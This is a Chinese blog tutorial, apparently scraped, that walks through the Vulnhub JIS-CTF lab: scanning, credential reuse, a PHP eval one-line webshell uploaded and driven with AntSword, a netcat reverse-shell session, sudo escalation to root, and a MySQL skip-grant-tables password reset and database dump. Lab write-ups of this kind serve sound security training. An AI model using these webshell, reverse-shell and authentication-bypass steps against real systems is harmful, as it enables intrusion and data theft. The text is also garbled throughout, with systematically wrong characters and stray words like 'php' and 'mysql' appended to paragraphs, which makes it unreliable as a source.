[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例（一）

时间 2020-06-08 标签网络安全自学六十五 vulnhub 靶机渗透环境搭建 jis ctf 入门示例

这是做者的网络安全自学教程系列，主要是关于安全工具和实践操做的在线笔记，特分享出来与博友们学习，但愿您们喜欢，一块儿进步。前文分享了SMBv3服务远程代码执行漏洞（CVE-2020-0796），攻击者可能利用此漏洞远程无需用户验证，执行恶意代码并获取机器的彻底控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目，采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程链接、Shell提权等获取5个flag。因为hack the box速度堪忧，做者选择了Vulnhub靶场，但愿深刻分析来帮助初学者。本文是一篇Web渗透的基础性文章，但愿对您有所帮助。php

做者做为网络安全的小白，分享一些自学基础教程给你们，主要是关于安全工具和实践操做的在线笔记，但愿您们喜欢。同时，更但愿您能与我一块儿操做和进步，后续将深刻学习网络安全和系统安全知识并分享相关实验。总之，但愿该系列文章对博友有所帮助，写文不易，大神们不喜勿喷，谢谢！若是文章对您有帮助，将是我创做的最大动力，点赞、评论、私聊都可，一块儿加油喔~css

文章目录

五.总结

PS：本文参考了github、安全网站和参考文献中的文章（详见参考文献），并结合本身的经验和实践进行撰写，也推荐你们阅读参考文献。html

做者的github资源：
软件安全：https://github.com/eastmountyxz/Software-Security-Course
其余工具：https://github.com/eastmountyxz/NetworkSecuritySelf-studypython

声明：本人坚定反对利用教学方法进行犯罪的行为，一切犯罪行为必将受到严惩，绿色网络须要咱们共同维护，更推荐你们了解它们背后的原理，更好地进行防御。mysql

前文欣赏：
[渗透&攻防] 一.从数据库原理学习网络攻防及防止SQL注入
 [渗透&攻防] 二.SQL MAP工具从零解读数据库及基础用法
 [渗透&攻防] 三.数据库之差别备份及Caidao利器
 [渗透&攻防] 四.详解MySQL数据库攻防及Fiddler神器分析数据包git

一.Vulnhub简介

Vulnhub是一个提供各类漏洞环境的靶场，每一个靶场有对应的目标和难度，挑战者经过网络闯入系统获取root权限和查看flag。Vulnhub中包含了各类各样的镜像，能够下载到本身的主机上练习，其大部分的环境是要用VMware或者VirtualBox打开运行的。github

做者看了Vulnhub的题目，是一个很是棒的Web渗透靶场，每一个靶机都是很酷的一个游戏，须要找到全部的flag和提权，而Hack the box速度堪忧。为了让更多朋友了解Web渗透基础知识，做者接下来会陆续分享该系列20篇文章，尽可能选择技术含量较高的靶场，结合技术点进行讲解，但愿大家喜欢~web

官方网址：https://www.vulnhub.com正则表达式

该网站包含了不少靶场题目，每一个靶场有对应的镜像下载地址、描述和难度等级等。好比“Me and My Girlfriend”以下图所示：
https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

二.JIS-CTF题目描述

靶场题目：JIS-CTF: VulnUpload
靶场地址：https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/
难度描述：包含5个Flag，初级难度，查找全部Flag平均须要1.5小时
靶场做者：Mohammad Khreesha
靶场描述：Description: There are five flags on this machine. Try to find them. It takes 1.5 hour on average to find all flags.
下载地址：
Download (Torrent)：https://download.vulnhub.com/jisctf/JIS-CTF-VulnUpload-CTF01.ova.torrent
Download (Mirror)：https://download.vulnhub.com/jisctf/JIS-CTF-VulnUpload-CTF01.ova

打开网址显示的内容以下图所示，咱们获取虚拟机格式的镜像，而后进行环境配置。

描述中显示“Only working with VirtualBox”，只能工做在VirtualBox中工做，但做者是在VMware虚拟机中完成的实验。读者结合自身环境进行渗透测试。

三.Vulnhub环境配置

该部分推荐i春秋F0rmat老师的文章：https://bbs.ichunqiu.com/thread-39761-1-5.html

第一步，下载资源
建议采用迅雷打开下载JIS-CTF-VulnUpload-CTF01.OVA文件。

下载完成以后以下图所示，能够看到一个OVA后缀的文件。

第二步，打开VMware虚拟机安装靶场
找到咱们刚才下载的文件，导入虚拟机。

选择存放的位置，而后点击导入。

若是出现未经过OVF规范一致性或虚拟硬件合规性检查，请单击“重试”导入。在编程或Web渗透过程当中，咱们会遇到各类问题和错误，须要学会谷歌和百度独立解决，这也是对你能力的一种提高。

第三步，导入完成以后，设置NAT网络模式，内存设置为2G，硬盘设置为32GB

第四步，点击开启虚拟机及配置过程
到开机页面选择第二个Ubuntu的高级选项，若是启动网络正常的话能够直接开机，若是网络不正常能够按下面步骤操做。

进入高级选项，再次选择第二个Linux内核版本的恢复模式回车。

等待系统启动完毕后，看到这个页面，咱们继续回车进入。

回车后会弹出选择界面，咱们选择root一行回车，接着再次回车进入命令行模式。

第五步，输入“mount -o rw,remount / ”命令，再配置网络问卷，不然后面可能没法保存网络配置文件

当Linux系统没法启动时，一般须要进入单用户模式修改一些配置文件，或调整一些参数方可启动。可是在进入单用户模式后，咱们的文件系统是只读模式，没法进行修改，那么这个时候就须要用到一条命令“mount –o remount,rw /”。这个命令让咱们的 / 路径文件系统的可读模式能自由修改。

mount -o rw,remount /

接着输入命令查看网卡：

ifconfig -a

做者的是ens33，而后继续输入命令修改网络配置文件。

vi /etc/network/interfaces

输入I修改模式，以下图所示。

修改这两个地方，改为你的网卡名称，而后输入“:wq”保存。

最后输入reboot重启便可。

运行结果以下图所示，我一直登陆不进去（不知道用户名和密码）。最初觉得是要求用VirtualBox虚拟机的缘由，后来反应过来，此时彷佛Kali上场开始渗透了。

四.Vulnhub靶机渗透详解

1.信息收集

首先是信息收集一波，任何网站或Web都须要进行一波扫描和分析。

第一步，扫描网卡名称

netdiscover -i

第二步，调用Nmap探测目标主机IP

nmap -sn 192.168.44.0/24

因为在同一个网段，因此和主机IP地址近视，扫描结果以下图所示，靶场IP为192.168.44.143。

第三步，调用Nmap探测靶机的开放端口信息

nmap -A 192.168.44.143
22端口：SSH远程链接
80端口：HTTP网站协议

第四步，利用dirb扫描80端口的目录文件，敏感文件分析很是重要

dirb http://192.168.44.143

2.First flag

咱们从敏感文件robots.txt中获取目录信息，查看内容以下图所示：

接着咱们发现一个敏感的关键词flag，输入目标地址：192.168.44.143/flag/，第一个flag浮出水面，比较基础，是敏感文件和目录相关。

The 1st flag is : {8734509128730458630012095}

3.Second flag

在地址栏中输入：http://192.168.44.143/admin_area/，显示以下图所示：

右键查看源码获得第二个flag，也是比较简单的知识点。
The 2nd flag is : {7412574125871236547895214}

与第二个flag同时出现的还有一个帐号和密码，说明接下来咱们须要利用这个帐号信息。

<html>
<head>
<title>
Fake admin area :)
</title>
<body>
<center><h1>The admin area not work :) </h1></center>
<!-- username : admin password : 3v1l_H@ck3r The 2nd flag is : {7412574125871236547895214} -->
</body>
</html>

4.Third flag

登陆分析

咱们以前打开了登陆页面，但没有帐号和密码。这里是否能用上面的帐号和密码呢？接着咱们进行了登陆尝试，返回页面是一个文件上传。

http://192.168.44.143/login.php
username : admin
password : 3v1l_H@ck3r

上传一句话木马

登陆以后是一个上传页面，咱们尝试上传一句话木马。

<?php @eval($_POST["eastmount"]); ?>

因为该网站采用PHP编写，一句话木马以下所示，咱们在Kali浏览器中打开并上传。

上传文件成功。

接下来咱们用要蚁剑来链接。

http://192.168.44.143/uploaded_files/shell.php

Kali系统安装中国蚁剑

接着咱们须要使用中国蚁剑来提取Webshell。蚁剑怎么在Kali下安装和使用呢？中国蚁剑推荐你们阅读以下文章，它是很是强大的一款渗透工具。

第一步，下载中国蚁剑可使用git命令，也能够直接从github中下载。

git clone https://github.com/antoor/antSword.git
cd antSword

做者从官网下载对应的Linux版本。

第二步，打开Kali终端找到你下载的中国蚁剑压缩包并解压。

unzip AntSword-Loader-v4.0.3-linux-x64.zip

解压显示以下图所示：

第三步，进入中国蚁剑压缩包并打开蚁剑。

./AntSword

蚁剑打开以下图所示：

第四步，建立一个空文件夹（用全英文名字）。

而后点击蚁剑“初始化”按钮，找到你新建的文件夹，并选择它进行安装。

执行结束以后，“./AntSword”会出现这个界面，说明安装成功。

蚁剑提权

第一步，利用前面上传的一句话木马。

<?php @eval($_POST['eastmount']);?>

第二步，运行蚁剑，右键单击“添加数据”，输入URL地址，链接密码以及编码设置。PHP语言推荐编辑器使用chr加密。

URL：http://192.168.44.143/uploaded_files/shell.php
密码：eastmount

接着整个后台显示出来，以下图所示，是否是感觉到了蚁剑的强大。

第三步，右键文件管理查看webshell目录

找到/var/www/html/目录下，看到hint.txt和flag.txt文件。

直接打开hint.txt文件，咱们看到了第三个flag和用户名technawi，该用户名又能作什么呢？

try to find user technawi password to read the flag.txt file, you can find it in a hidden file 😉

The 3rd flag is : {7645110034526579012345670}

注意，这里若是您对信息比较敏感，可能会经过直接访问hint.txt获得第三个flag和用户technawi。但更推荐你们尝试中国蚁剑和一句话木马的渗透方法。

第四步，gobuster目录扫描
注意，hint.txt文件是可以直接访问的，但flag.txt文件却没法访问。咱们补充一个目录扫描知识点，使用gobuster依次扫各目录下的txt文件。robots.txt和hint.txt目录为200，表示能直接访问，其余目录均不能直接访问，flag.txt提示403。

/robots.txt (Status: 200)
/hint.txt (Status: 200)

root@kali:~# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.44.143 -t 100 -x txt
/assets (Status: 301)
/css (Status: 301)
/js (Status: 301)
/flag (Status: 301)
/flag.txt (Status: 403)
/robots.txt (Status: 200)
/uploaded_files (Status: 301)
/hint.txt (Status: 200)
/server-status (Status: 403)

那怎么才能获取flag.txt内容呢？此时你须要想到用户权限的限制和提取处理。

最后补充另外一种提权方法，上传php-reverse-shell反弹shell到kali攻击机获得shell。

root@redwand:~# rlwrap nc -lvp 6666
listening on [any] 6666 ...
192.168.0.149: inverse host lookup failed: Unknown host
connect to [192.168.0.103] from (UNKNOWN) [192.168.0.149] 56148
Linux Jordaninfosec-CTF01 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 04:28:10 up 52 min,  0 users,  load average: 0.00, 2.25, 3.94
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@Jordaninfosec-CTF01:/$

5.Fourth flag

刚才在第三个flag提示咱们“try to find user technawi password to read the flag.txt file, you can find it in a hidden file ”，表示须要用technawi读取flag.txt文件，咱们能够在隐藏文件中找到用户的信息。那怎么去实现呢？

第一步，咱们在蚁剑中启动shell的命令行模式，命令“2>/dev/null”表示过滤掉相似没有权限的信息。

find / -user ‘technawi’ 2>/dev/null

咱们看到了一个特殊的文件/etc/mysql/conf.d/credentials.txt ，尝试去读一下里面的信息，获得flag。

(www-data:/var/www/html) $ find / -user 'technawi' 2>/dev/null
/etc/mysql/conf.d/credentials.txt
/var/www/html/flag.txt
/home/technawi
/home/technawi/.cache
/home/technawi/.bash_history
/home/technawi/.sudo_as_admin_successful
/home/technawi/.profile
/home/technawi/.bashrc
/home/technawi/.bash_logout
(www-data:/var/www/html) $ cat /etc/mysql/conf.d/credentials.txt
The 4th flag is : {7845658974123568974185412}
username : technawi
password : 3vilH@ksor
(www-data:/var/www/html) $

获取第四个Flag和technawi用户对应的密码。

The 4th flag is : {7845658974123568974185412}
username : technawi
password : 3vilH@ksor

6.Fifth flag

若是直接读取flag.txt文件，显示为空，须要对应的用户和权限。

接着咱们采用SSH链接，帐号和密码为第4个flag获取的值。

username : technawi
password : 3vilH@ksor
ssh technawi@192.168.44.143

找到登录用户technawi，而后去读取刚才flag.txt文件，获得最后的flag。

cat /var/www/html/flag.txt
The 5th flag is : {5473215946785213456975249}

7.sudo提权

在Web渗透中，提权和数据库获取也是很是重要的知识点。尽管Vulnhub是渗透靶场，但获取flag并非咱们的惟一目标，提权也颇有意思。前面咱们在home目录下发现 .sudo_as_admin_successful 文件，表示须要使用sudo提权。

root权限能够直接使用sudo su -得到

首先咱们使用sudo -l看看sudo权限。

显示“ALL”说明technawi能够用本身的密码切换为 root 用户，输入“sudo su root”命令，密码为3vilH@ksor。权限成功从technawi提高为root。

8.获取数据库数据

一样数据库操做也很是有意思，咱们尝试获取mysql数据库内容。

核心步骤为：登陆root权限，新建目录并使用命令跳过输入密码过程

mkdir -p /var/run/mysqld
chown -R mysql:mysql /var/run/mysqld
mysqld_safe --skip-grant-tables &

technawi@Jordaninfosec-CTF01:/var/www$ sudo su root
root@Jordaninfosec-CTF01:/var/www# whoami
root
root@Jordaninfosec-CTF01:/var/www# ls
html
root@Jordaninfosec-CTF01:/var/www# mkdir -p /var/run/mysqld
root@Jordaninfosec-CTF01:/var/www# chown -R mysql:mysql /var/run/mysqld
root@Jordaninfosec-CTF01:/var/www# mysqld_safe --skip-grant-tables &
[1] 1910
root@Jordaninfosec-CTF01:/var/www# 2020-04-10T06:31:09.933846Z mysqld_safe Logging to syslog.
2020-04-10T06:31:09.936319Z mysqld_safe Logging to '/var/log/mysql/error.log'.
2020-04-10T06:31:09.941145Z mysqld_safe Logging to '/var/log/mysql/error.log'.
2020-04-10T06:31:09.959551Z mysqld_safe A mysqld process already exists

输出结果以下图所示：

接着新开一个终端mysql -uroot无密码登录便可，但做者老是报错。

哎！本身仍是太弱了，最后该部分补充Redwand老师的成功代码。
[VulnHub] JIS-CTF - redwand

root@Jordaninfosec-CTF01:/tmp# mysql -uroot
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.7.17-0ubuntu0.16.04.2 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

查看数据库以下：

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
4 rows in set (0.00 sec)

查看mysql.user表以下：

mysql> select host,user,authentication_string,plugin from user;
+-----------+------------------+-------------------------------------------+-----------------------+
| host      | user             | authentication_string                     | plugin                |
+-----------+------------------+-------------------------------------------+-----------------------+
| localhost | root             | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | mysql_native_password |
| localhost | mysql.sys        | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE | mysql_native_password |
| localhost | debian-sys-maint | *C46C96C2990814041379A76A744EE3E5026A0D64 | mysql_native_password |
+-----------+------------------+-------------------------------------------+-----------------------+

更新root密码为123456以下：

mysql> update user set authentication_string=password("123456") where user="root";
Query OK, 0 rows affected, 1 warning (0.00 sec)
Rows matched: 1  Changed: 0  Warnings: 1
mysql>flush privileges;

mysqldump导出须要的数据库，完成mysql脱裤。

root@Jordaninfosec-CTF01:/tmp# mysqldump -uroot -p sys > sys.sql
Enter password:

五.总结

写道这里，这篇文章讲解完毕，后续会更深刻的分享。文章内容包括：

netdiscover 用于发现目标ip
nmap进行端口扫描
dirb进行目录扫描
敏感文件获取及分析
php木马生成和蚁剑工具
ssh远程链接
sudo提权
数据库脱裤

但愿这系列文章对您有所帮助，真的感受本身技术好菜，要学的知识好多。转眼4月份到来，这是第65篇原创的安全系列文章，从网络安全到系统安全，从木马病毒到后门劫持，从恶意代码到溯源分析，从渗透工具到二进制工具，还有Python安全、顶会论文、黑客比赛和漏洞分享。未知攻焉知防，人生漫漫其路远兮，做为初学者，本身真是爬着前行；同时学术论文得深刻了，加油！感谢不少人的帮助，继续爬着，继续加油！

欢迎你们讨论，是否以为这系列文章帮助到您！任何建议均可以评论告知读者，共勉。

(By:Eastmount 2020-04-15 晚上10点写于贵阳 http://blog.csdn.net/eastmount/)

参考文献：
[1] https://www.vulnhub.com
[2] 教你怎么用Vulnhub来搭建环境 - i春秋老师F0rmat
[3] [VulnHub] JIS-CTF - redwand
[4] OSCP - JIS-CTF-VulnUpload-CTF01 - 青蛙爱轮滑
[5] JIS-CTF_VulnUpload靶机攻略 - FreeBuf yangyangwithgnu
[6] Vulnhub JIS-CTF-VulnUpload靶机渗透 - A1oe
[7] vulnhub靶场渗透学习-JIS-CTF - Shang176